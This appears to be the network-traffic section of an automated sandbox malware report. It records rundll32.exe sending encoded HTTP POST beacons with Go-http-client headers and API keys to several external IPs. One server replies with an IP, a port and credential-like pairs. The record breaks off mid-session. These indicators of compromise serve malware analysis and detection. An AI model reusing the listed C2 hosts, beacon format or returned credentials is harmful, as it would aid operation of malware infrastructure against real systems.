        Aug 9, 2024 19:31:23.668715954 CEST804975591.142.74.28192.168.2.4
        Aug 9, 2024 19:31:23.670099974 CEST4975580192.168.2.491.142.74.28
        Aug 9, 2024 19:31:23.670452118 CEST4975580192.168.2.491.142.74.28
        Aug 9, 2024 19:31:23.676255941 CEST804975591.142.74.28192.168.2.4
        Aug 9, 2024 19:31:23.717669010 CEST4975380192.168.2.4195.2.70.38
        Aug 9, 2024 19:31:23.778482914 CEST8049754195.2.70.38192.168.2.4
        Aug 9, 2024 19:31:23.782784939 CEST4975680192.168.2.491.142.74.28
        Aug 9, 2024 19:31:23.788028002 CEST804975691.142.74.28192.168.2.4
        Aug 9, 2024 19:31:23.790132999 CEST4975680192.168.2.491.142.74.28
        Aug 9, 2024 19:31:23.790730953 CEST4975680192.168.2.491.142.74.28
        Aug 9, 2024 19:31:23.795743942 CEST804975691.142.74.28192.168.2.4
        Aug 9, 2024 19:31:23.822237015 CEST4975480192.168.2.4195.2.70.38
        Aug 9, 2024 19:31:24.374453068 CEST804975591.142.74.28192.168.2.4
        Aug 9, 2024 19:31:24.377069950 CEST4975780192.168.2.477.238.224.56
        Aug 9, 2024 19:31:24.382200003 CEST804975777.238.224.56192.168.2.4
        Aug 9, 2024 19:31:24.382354021 CEST4975780192.168.2.477.238.224.56
        Aug 9, 2024 19:31:24.383058071 CEST4975780192.168.2.477.238.224.56
        Aug 9, 2024 19:31:24.388032913 CEST804975777.238.224.56192.168.2.4
        Aug 9, 2024 19:31:24.415043116 CEST4975580192.168.2.491.142.74.28
        Aug 9, 2024 19:31:24.499926090 CEST804975691.142.74.28192.168.2.4
        Aug 9, 2024 19:31:24.502337933 CEST4975880192.168.2.477.238.224.56
        Aug 9, 2024 19:31:24.507260084 CEST804975877.238.224.56192.168.2.4
        Aug 9, 2024 19:31:24.507436037 CEST4975880192.168.2.477.238.224.56
        Aug 9, 2024 19:31:24.508050919 CEST4975880192.168.2.477.238.224.56
        Aug 9, 2024 19:31:24.514098883 CEST804975877.238.224.56192.168.2.4
        Aug 9, 2024 19:31:24.555022955 CEST4975680192.168.2.491.142.74.28
        Aug 9, 2024 19:31:25.000452995 CEST804975777.238.224.56192.168.2.4
        Aug 9, 2024 19:31:25.024415016 CEST4975980192.168.2.477.238.229.63
        Aug 9, 2024 19:31:25.029705048 CEST804975977.238.229.63192.168.2.4
        Aug 9, 2024 19:31:25.029829025 CEST4975980192.168.2.477.238.229.63
        Aug 9, 2024 19:31:25.030198097 CEST4975980192.168.2.477.238.229.63
        Aug 9, 2024 19:31:25.036955118 CEST804975977.238.229.63192.168.2.4
        Aug 9, 2024 19:31:25.046369076 CEST4975780192.168.2.477.238.224.56
        Aug 9, 2024 19:31:25.115820885 CEST804975877.238.224.56192.168.2.4
        Aug 9, 2024 19:31:25.117402077 CEST4976080192.168.2.477.238.229.63
        Aug 9, 2024 19:31:25.122629881 CEST804976077.238.229.63192.168.2.4
        Aug 9, 2024 19:31:25.122745991 CEST4976080192.168.2.477.238.229.63
        Aug 9, 2024 19:31:25.123140097 CEST4976080192.168.2.477.238.229.63
        Aug 9, 2024 19:31:25.128163099 CEST804976077.238.229.63192.168.2.4
        Aug 9, 2024 19:31:25.170527935 CEST4975880192.168.2.477.238.224.56
        Aug 9, 2024 19:31:25.768892050 CEST804976077.238.229.63192.168.2.4
        Aug 9, 2024 19:31:25.811079025 CEST4976080192.168.2.477.238.229.63
        Aug 9, 2024 19:31:25.812309980 CEST804975977.238.229.63192.168.2.4
        Aug 9, 2024 19:31:25.857955933 CEST4975980192.168.2.477.238.229.63
        Aug 9, 2024 19:31:26.479943037 CEST4976180192.168.2.477.238.250.123
        Aug 9, 2024 19:31:26.493649006 CEST4976280192.168.2.477.238.250.123
        Aug 9, 2024 19:31:26.590218067 CEST804976177.238.250.123192.168.2.4
        Aug 9, 2024 19:31:26.590256929 CEST804976277.238.250.123192.168.2.4
        Aug 9, 2024 19:31:26.590370893 CEST4976180192.168.2.477.238.250.123
        Aug 9, 2024 19:31:26.591015100 CEST4976280192.168.2.477.238.250.123
        Aug 9, 2024 19:31:26.591015100 CEST4976180192.168.2.477.238.250.123
        Aug 9, 2024 19:31:26.591090918 CEST4976280192.168.2.477.238.250.123
        Aug 9, 2024 19:31:26.598666906 CEST804976177.238.250.123192.168.2.4
        Aug 9, 2024 19:31:26.598721981 CEST804976277.238.250.123192.168.2.4
        Aug 9, 2024 19:31:27.217256069 CEST804976277.238.250.123192.168.2.4
        Aug 9, 2024 19:31:27.218018055 CEST804976177.238.250.123192.168.2.4
        Aug 9, 2024 19:31:27.263191938 CEST4976280192.168.2.477.238.250.123
        Aug 9, 2024 19:31:27.263238907 CEST4976180192.168.2.477.238.250.123
        • 195.2.70.38
        • 91.142.74.28
        • 77.238.224.56
        • 77.238.229.63
        • 77.238.250.123
        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        0192.168.2.449736195.2.70.38807132C:\Windows\SysWOW64\rundll32.exe
        TimestampBytes transferredDirectionData
        Aug 9, 2024 19:28:46.922494888 CEST293OUTPOST / HTTP/1.1
        Host: 195.2.70.38
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: 4bxNKbGL
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:28:47.557013988 CEST183INHTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:28:47 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests
        Aug 9, 2024 19:28:47.770724058 CEST183INHTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:28:47 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        1192.168.2.44973791.142.74.28807132C:\Windows\SysWOW64\rundll32.exe
        TimestampBytes transferredDirectionData
        Aug 9, 2024 19:28:47.706377029 CEST294OUTPOST / HTTP/1.1
        Host: 91.142.74.28
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: mIeSOwbQ
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:28:48.350313902 CEST544INHTTP/1.1 200 OK
        Date: Fri, 09 Aug 2024 17:28:48 GMT
        Content-Length: 426
        Content-Type: text/plain; charset=utf-8
        Data Raw: 39 34 2e 31 30 33 2e 39 30 2e 39 3b 32 36 33 39 35 3b 68 6b 4f 36 74 30 6a 36 74 66 69 76 70 6d 53 47 3a 69 35 4f 2f 4f 72 35 2f 33 46 30 31 51 41 4c 39 31 51 45 35 5a 78 70 2e 31 6d 75 32 58 6d 37 2e 72 57 53 37 38 48 64 30 71 33 75 2e 41 6d 69 33 33 47 47 38 51 39 39 2c 37 6a 39 68 41 41 45 74 6e 70 5a 74 31 6b 6d 70 73 42 47 3a 73 42 76 2f 48 33 6d 2f 59 4f 6a 39 4c 70 67 31 45 77 6b 2e 4e 4e 6a 31 79 78 67 34 68 38 7a 32 6f 4b 66 2e 65 33 4d 37 6f 54 6e 34 55 58 63 2e 33 36 39 32 58 53 53 38 7a 37 73 2c 33 6f 4d 68 51 76 31 74 52 63 33 74 67 73 62 70 4d 66 65 3a 35 37 79 2f 4a 4b 45 2f 69 38 59 37 47 6c 39 37 49 4c 74 2e 42 61 55 32 4e 56 55 33 43 6d 54 38 6a 72 58 2e 64 53 59 32 38 73 6c 32 70 31 59 34 56 45 57 2e 5a 34 6e 35 4c 35 61 36 68 4c 47 2c 54 49 71 68 32 69 36 74 79 79 41 74 54 4a 4c 70 6d 35 4d 3a 75 39 4e 2f 44 49 36 2f 74 53 53 37 47 66 58 37 6a 38 77 2e 58 37 35 32 34 57 64 33 6b 5a 34 38 45 52 58 2e 58 73 67 32 77 53 6b 32 38 78 37 39 6d 77 34 2e 72 78 78 36 74 46 35 33 4e 33 36 [TRUNCATED]
        Data Ascii: 94.103.90.9;26395;hkO6t0j6tfivpmSG:i5O/Or5/3F01QAL91QE5Zxp.1mu2Xm7.rWS78Hd0q3u.Ami33GG8Q99,7j9hAAEtnpZt1kmpsBG:sBv/H3m/YOj9Lpg1Ewk.NNj1yxg4h8z2oKf.e3M7oTn4UXc.3692XSS8z7s,3oMhQv1tRc3tgsbpMfe:57y/JKE/i8Y7Gl97ILt.BaU2NVU3CmT8jrX.dSY28sl2p1Y4VEW.Z4n5L5a6hLG,TIqh2i6tyyAtTJLpm5M:u9N/DI6/tSS7GfX7j8w.X7524Wd3kZ48ERX.Xsg2wSk28x79mw4.rxx6tF53N36,fDzhjist0JDtjPKpt1U:ZPz/9fl/PMu7ZLI7N4a.WUv2PAK3lUa89jI.bZJ2dZu5ujp0S8e.Wxk1oNG2TWy3R7P
        Aug 9, 2024 19:29:18.494987965 CEST6OUTData Raw: 00
        Data Ascii:
        Aug 9, 2024 19:29:48.694083929 CEST6OUTData Raw: 00
        Data Ascii:


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        2192.168.2.449743195.2.70.38807100C:\Windows\SysWOW64\rundll32.exe
        TimestampBytes transferredDirectionData
        Aug 9, 2024 19:30:49.683842897 CEST293OUTPOST / HTTP/1.1
        Host: 195.2.70.38
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: 9p7rm0wE
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:30:50.384175062 CEST183INHTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:30:50 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        3192.168.2.449744195.2.70.38807020C:\Windows\SysWOW64\rundll32.exe
        TimestampBytes transferredDirectionData
        Aug 9, 2024 19:30:49.774321079 CEST293OUTPOST / HTTP/1.1
        Host: 195.2.70.38
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: AZxF0cl2
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:30:50.488085032 CEST183INHTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:30:50 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        4192.168.2.44974591.142.74.28807100C:\Windows\SysWOW64\rundll32.exe
        TimestampBytes transferredDirectionData
        Aug 9, 2024 19:30:50.391410112 CEST294OUTPOST / HTTP/1.1
        Host: 91.142.74.28
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: Ndivacfu
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:30:51.081151962 CEST183INHTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:30:50 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        5192.168.2.44974691.142.74.28807020C:\Windows\SysWOW64\rundll32.exe
        TimestampBytes transferredDirectionData
        Aug 9, 2024 19:30:50.495434999 CEST294OUTPOST / HTTP/1.1
        Host: 91.142.74.28
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: YWqi881N
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:30:51.205766916 CEST183INHTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:30:51 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        6192.168.2.44974777.238.224.56807100C:\Windows\SysWOW64\rundll32.exe
        TimestampBytes transferredDirectionData
        Aug 9, 2024 19:30:51.088288069 CEST295OUTPOST / HTTP/1.1
        Host: 77.238.224.56
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: pSH0uf0r
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:30:51.686045885 CEST183INHTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:30:51 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        7192.168.2.44974877.238.224.56807020C:\Windows\SysWOW64\rundll32.exe
        TimestampBytes transferredDirectionData
        Aug 9, 2024 19:30:51.213885069 CEST295OUTPOST / HTTP/1.1
        Host: 77.238.224.56
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: nHAjwczh
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:30:51.814228058 CEST183INHTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:30:51 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        8192.168.2.44974977.238.229.63807100C:\Windows\SysWOW64\rundll32.exe
        TimestampBytes transferredDirectionData
        Aug 9, 2024 19:30:51.693206072 CEST295OUTPOST / HTTP/1.1
        Host: 77.238.229.63
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: 7JOwxDih
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:30:52.289711952 CEST183INHTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:30:52 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        9192.168.2.44975077.238.229.63807020C:\Windows\SysWOW64\rundll32.exe
        TimestampBytes transferredDirectionData
        Aug 9, 2024 19:30:51.822561026 CEST295OUTPOST / HTTP/1.1
        Host: 77.238.229.63
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: tfj4nXhJ
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:30:52.422346115 CEST183INHTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:30:52 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        10192.168.2.44975177.238.250.123807100C:\Windows\SysWOW64\rundll32.exe
        TimestampBytes transferredDirectionData
        Aug 9, 2024 19:30:52.297672987 CEST296OUTPOST / HTTP/1.1
        Host: 77.238.250.123
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: rckIC1PP
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:30:52.919675112 CEST183INHTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:30:52 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        11192.168.2.44975277.238.250.123807020C:\Windows\SysWOW64\rundll32.exe
        TimestampBytes transferredDirectionData
        Aug 9, 2024 19:30:52.432462931 CEST296OUTPOST / HTTP/1.1
        Host: 77.238.250.123
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: wdTOKsK4
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:30:53.041307926 CEST183INHTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
        X-Content-Type-Options: nosniff
        Date: Fri, 09 Aug 2024 17:30:52 GMT
        Content-Length: 18
        Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
        Data Ascii: Too many requests


        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
        12192.168.2.449753195.2.70.38807100C:\Windows\SysWOW64\rundll32.exe
        TimestampBytes transferredDirectionData
        Aug 9, 2024 19:31:22.960441113 CEST293OUTPOST / HTTP/1.1
        Host: 195.2.70.38
        User-Agent: Go-http-client/1.1
        Content-Length: 158
        X-Api-Key: iqzDLg5J
        Accept-Encoding: gzip
        Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12
        Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
        Aug 9, 2024 19:31:23.661927938 CEST183INHTTP/1.1 429 Too Many Requests
        Content-Type: text/plain; charset=utf-8
